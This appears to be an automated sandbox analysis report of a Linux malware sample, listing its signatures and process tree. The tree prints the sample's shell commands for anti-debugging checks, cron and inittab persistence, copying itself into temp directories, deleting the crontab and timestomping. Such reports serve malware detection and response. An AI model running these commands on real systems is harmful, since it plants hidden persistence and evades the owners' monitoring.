Analysis

  • max time kernel
    0s
  • max time network
    102s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • submitted
    14-03-2022 02:35

General

  • Target

    582a434ba0f2e04bd8b5495c50320068

  • Size

    98KB

  • MD5

    582a434ba0f2e04bd8b5495c50320068

  • SHA1

    b3888d650646aa63423765e686a14ddc82ee52be

  • SHA256

    7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3

  • SHA512

    5d4075888d1414f57edd832c6fb7151103af441eafebfdeb97be077bcfa504429f792c1fb23f18674aaf94ba1c6fa8d42e7c73a0d7f2d845f7d9faa605ac6fe4

Score
9/10

Malware Config

Signatures

  • Writes file to system bin folder 1 TTPs 3 IoCs
  • Modifies rc script 1 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Write file to user bin folder 1 TTPs 2 IoCs
  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • ./582a434ba0f2e04bd8b5495c50320068
    ./582a434ba0f2e04bd8b5495c50320068
    1⤵
    • Modifies rc script
    • Writes file to tmp directory
    PID:593
  • /bin/sh
    sh -c "pidof -x strace > /dev/null"
    1⤵
      PID:594
      • /bin/pidof
        pidof -x strace
        2⤵
          PID:595
      • /bin/sh
        sh -c "pidof -x tcpdump > /dev/null"
        1⤵
          PID:596
          • /bin/pidof
            pidof -x tcpdump
            2⤵
              PID:597
          • /bin/sh
            sh -c "cat /etc/inittab | grep -v \"/tmp/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"
            1⤵
              PID:600
              • /bin/cat
                cat /etc/inittab
                2⤵
                  PID:602
                • /bin/grep
                  grep -v /tmp/582a434ba0f2e04bd8b5495c50320068
                  2⤵
                    PID:604
                • /bin/sh
                  sh -c "crontab -l | grep /tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"
                  1⤵
                    PID:601
                    • /usr/bin/crontab
                      crontab -l
                      2⤵
                        PID:605
                      • /bin/grep
                        grep /tmp/582a434ba0f2e04bd8b5495c50320068
                        2⤵
                          PID:607
                        • /bin/grep
                          grep -v "no cron"
                          2⤵
                            PID:608
                          • /usr/bin/crontab
                            crontab -
                            2⤵
                              PID:612
                          • /bin/sh
                            sh -c "crontab -r"
                            1⤵
                              PID:603
                              • /usr/bin/crontab
                                crontab -r
                                2⤵
                                  PID:606
                              • /bin/sh
                                sh -c "echo \"0:2345:respawn:/tmp/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"
                                1⤵
                                  PID:609
                                • /bin/sh
                                  sh -c "cat /etc/inittab2 > /etc/inittab"
                                  1⤵
                                    PID:610
                                    • /bin/cat
                                      cat /etc/inittab2
                                      2⤵
                                        PID:613
                                    • /usr/bin/crontab
                                      crontab -l
                                      1⤵
                                        PID:614
                                      • /bin/sh
                                        sh -c "rm -rf /etc/inittab2"
                                        1⤵
                                          PID:615
                                          • /bin/rm
                                            rm -rf /etc/inittab2
                                            2⤵
                                              PID:616
                                          • /bin/sh
                                            sh -c "touch -acmr /bin/ls /etc/inittab"
                                            1⤵
                                              PID:617
                                              • /usr/bin/touch
                                                touch -acmr /bin/ls /etc/inittab
                                                2⤵
                                                  PID:618
                                              • /bin/sh
                                                sh -c "/bin/uname -n"
                                                1⤵
                                                  PID:621
                                                  • /bin/uname
                                                    /bin/uname -n
                                                    2⤵
                                                      PID:623
                                                  • /bin/sh
                                                    sh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068"
                                                    1⤵
                                                      PID:622
                                                      • /bin/cp
                                                        cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068
                                                        2⤵
                                                        • Reads runtime system information
                                                        • Writes file to tmp directory
                                                        PID:624
                                                    • /bin/sh
                                                      sh -c "cat /etc/inittab | grep -v \"/dev/shm/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"
                                                      1⤵
                                                        PID:626
                                                        • /bin/cat
                                                          cat /etc/inittab
                                                          2⤵
                                                            PID:628
                                                          • /bin/grep
                                                            grep -v /dev/shm/582a434ba0f2e04bd8b5495c50320068
                                                            2⤵
                                                              PID:629
                                                          • /bin/sh
                                                            sh -c "crontab -l | grep /dev/shm/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"
                                                            1⤵
                                                              PID:627
                                                              • /bin/grep
                                                                grep /dev/shm/582a434ba0f2e04bd8b5495c50320068
                                                                2⤵
                                                                  PID:631
                                                                • /usr/bin/crontab
                                                                  crontab -l
                                                                  2⤵
                                                                    PID:630
                                                                  • /bin/grep
                                                                    grep -v "no cron"
                                                                    2⤵
                                                                      PID:636
                                                                    • /usr/bin/crontab
                                                                      crontab -
                                                                      2⤵
                                                                        PID:640
                                                                    • /bin/sh
                                                                      sh -c "echo \"0:2345:respawn:/dev/shm/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"
                                                                      1⤵
                                                                        PID:637
                                                                      • /bin/sh
                                                                        sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                        1⤵
                                                                          PID:638
                                                                          • /bin/cat
                                                                            cat /etc/inittab2
                                                                            2⤵
                                                                              PID:641
                                                                          • /usr/bin/crontab
                                                                            crontab -l
                                                                            1⤵
                                                                              PID:642
                                                                            • /bin/sh
                                                                              sh -c "rm -rf /etc/inittab2"
                                                                              1⤵
                                                                                PID:643
                                                                                • /bin/rm
                                                                                  rm -rf /etc/inittab2
                                                                                  2⤵
                                                                                    PID:644
                                                                                • /bin/sh
                                                                                  sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                  1⤵
                                                                                    PID:645
                                                                                    • /usr/bin/touch
                                                                                      touch -acmr /bin/ls /etc/inittab
                                                                                      2⤵
                                                                                        PID:646
                                                                                    • /bin/sh
                                                                                      sh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068"
                                                                                      1⤵
                                                                                        PID:647
                                                                                        • /bin/cp
                                                                                          cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068
                                                                                          2⤵
                                                                                          • Reads runtime system information
                                                                                          • Writes file to tmp directory
                                                                                          PID:648
                                                                                      • /bin/sh
                                                                                        sh -c "cat /etc/inittab | grep -v \"/var/tmp/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"
                                                                                        1⤵
                                                                                          PID:650
                                                                                          • /bin/cat
                                                                                            cat /etc/inittab
                                                                                            2⤵
                                                                                              PID:652
                                                                                            • /bin/grep
                                                                                              grep -v /var/tmp/582a434ba0f2e04bd8b5495c50320068
                                                                                              2⤵
                                                                                                PID:653
                                                                                            • /bin/sh
                                                                                              sh -c "crontab -l | grep /var/tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"
                                                                                              1⤵
                                                                                                PID:651
                                                                                                • /usr/bin/crontab
                                                                                                  crontab -l
                                                                                                  2⤵
                                                                                                    PID:654
                                                                                                  • /bin/grep
                                                                                                    grep /var/tmp/582a434ba0f2e04bd8b5495c50320068
                                                                                                    2⤵
                                                                                                      PID:655
                                                                                                    • /bin/grep
                                                                                                      grep -v "no cron"
                                                                                                      2⤵
                                                                                                        PID:656
                                                                                                      • /usr/bin/crontab
                                                                                                        crontab -
                                                                                                        2⤵
                                                                                                          PID:660
                                                                                                      • /bin/sh
                                                                                                        sh -c "echo \"0:2345:respawn:/var/tmp/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"
                                                                                                        1⤵
                                                                                                          PID:657
                                                                                                        • /bin/sh
                                                                                                          sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                          1⤵
                                                                                                            PID:658
                                                                                                            • /bin/cat
                                                                                                              cat /etc/inittab2
                                                                                                              2⤵
                                                                                                                PID:662
                                                                                                            • /usr/bin/crontab
                                                                                                              crontab -l
                                                                                                              1⤵
                                                                                                                PID:661
                                                                                                              • /bin/sh
                                                                                                                sh -c "rm -rf /etc/inittab2"
                                                                                                                1⤵
                                                                                                                  PID:663
                                                                                                                  • /bin/rm
                                                                                                                    rm -rf /etc/inittab2
                                                                                                                    2⤵
                                                                                                                      PID:664
                                                                                                                  • /bin/sh
                                                                                                                    sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                    1⤵
                                                                                                                      PID:665
                                                                                                                      • /usr/bin/touch
                                                                                                                        touch -acmr /bin/ls /etc/inittab
                                                                                                                        2⤵
                                                                                                                          PID:666
                                                                                                                      • /bin/sh
                                                                                                                        sh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068"
                                                                                                                        1⤵
                                                                                                                          PID:667
                                                                                                                          • /bin/cp
                                                                                                                            cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068
                                                                                                                            2⤵
                                                                                                                            • Reads runtime system information
                                                                                                                            • Writes file to tmp directory
                                                                                                                            PID:668
                                                                                                                        • /bin/sh
                                                                                                                          sh -c "cat /etc/inittab | grep -v \"/var/lock/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"
                                                                                                                          1⤵
                                                                                                                            PID:670
                                                                                                                            • /bin/cat
                                                                                                                              cat /etc/inittab
                                                                                                                              2⤵
                                                                                                                                PID:672
                                                                                                                              • /bin/grep
                                                                                                                                grep -v /var/lock/582a434ba0f2e04bd8b5495c50320068
                                                                                                                                2⤵
                                                                                                                                  PID:673
                                                                                                                              • /bin/sh
                                                                                                                                sh -c "crontab -l | grep /var/lock/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                1⤵
                                                                                                                                  PID:671
                                                                                                                                  • /usr/bin/crontab
                                                                                                                                    crontab -l
                                                                                                                                    2⤵
                                                                                                                                      PID:674
                                                                                                                                    • /bin/grep
                                                                                                                                      grep /var/lock/582a434ba0f2e04bd8b5495c50320068
                                                                                                                                      2⤵
                                                                                                                                        PID:675
                                                                                                                                      • /bin/grep
                                                                                                                                        grep -v "no cron"
                                                                                                                                        2⤵
                                                                                                                                          PID:677
                                                                                                                                        • /usr/bin/crontab
                                                                                                                                          crontab -
                                                                                                                                          2⤵
                                                                                                                                            PID:680
                                                                                                                                        • /bin/sh
                                                                                                                                          sh -c "echo \"0:2345:respawn:/var/lock/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"
                                                                                                                                          1⤵
                                                                                                                                            PID:676
                                                                                                                                          • /bin/sh
                                                                                                                                            sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                            1⤵
                                                                                                                                              PID:678
                                                                                                                                              • /bin/cat
                                                                                                                                                cat /etc/inittab2
                                                                                                                                                2⤵
                                                                                                                                                  PID:681
                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                crontab -l
                                                                                                                                                1⤵
                                                                                                                                                  PID:682
                                                                                                                                                • /bin/sh
                                                                                                                                                  sh -c "rm -rf /etc/inittab2"
                                                                                                                                                  1⤵
                                                                                                                                                    PID:683
                                                                                                                                                    • /bin/rm
                                                                                                                                                      rm -rf /etc/inittab2
                                                                                                                                                      2⤵
                                                                                                                                                        PID:684
                                                                                                                                                    • /bin/sh
                                                                                                                                                      sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                                      1⤵
                                                                                                                                                        PID:685
                                                                                                                                                        • /usr/bin/touch
                                                                                                                                                          touch -acmr /bin/ls /etc/inittab
                                                                                                                                                          2⤵
                                                                                                                                                            PID:686
                                                                                                                                                        • /bin/sh
                                                                                                                                                          sh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068"
                                                                                                                                                          1⤵
                                                                                                                                                            PID:687
                                                                                                                                                            • /bin/cp
                                                                                                                                                              cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068
                                                                                                                                                              2⤵
                                                                                                                                                              • Reads runtime system information
                                                                                                                                                              • Writes file to tmp directory
                                                                                                                                                              PID:688
                                                                                                                                                          • /bin/sh
                                                                                                                                                            sh -c "cat /etc/inittab | grep -v \"/var/run/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:690
                                                                                                                                                              • /bin/cat
                                                                                                                                                                cat /etc/inittab
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:692
                                                                                                                                                                • /bin/grep
                                                                                                                                                                  grep -v /var/run/582a434ba0f2e04bd8b5495c50320068
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:694
                                                                                                                                                                • /bin/sh
                                                                                                                                                                  sh -c "crontab -l | grep /var/run/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:691
                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                      crontab -l
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:693
                                                                                                                                                                      • /bin/grep
                                                                                                                                                                        grep /var/run/582a434ba0f2e04bd8b5495c50320068
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:695
                                                                                                                                                                        • /bin/grep
                                                                                                                                                                          grep -v "no cron"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:696
                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                            crontab -
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:699
                                                                                                                                                                          • /bin/sh
                                                                                                                                                                            sh -c "echo \"0:2345:respawn:/var/run/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:697
                                                                                                                                                                            • /bin/sh
                                                                                                                                                                              sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:700
                                                                                                                                                                                • /bin/cat
                                                                                                                                                                                  cat /etc/inittab2
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:702
                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                  crontab -l
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:701
                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                    sh -c "rm -rf /etc/inittab2"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:703
                                                                                                                                                                                      • /bin/rm
                                                                                                                                                                                        rm -rf /etc/inittab2
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:704
                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                        sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:705
                                                                                                                                                                                          • /usr/bin/touch
                                                                                                                                                                                            touch -acmr /bin/ls /etc/inittab
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:706

                                                                                                                                                                                          Network

                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                          Downloads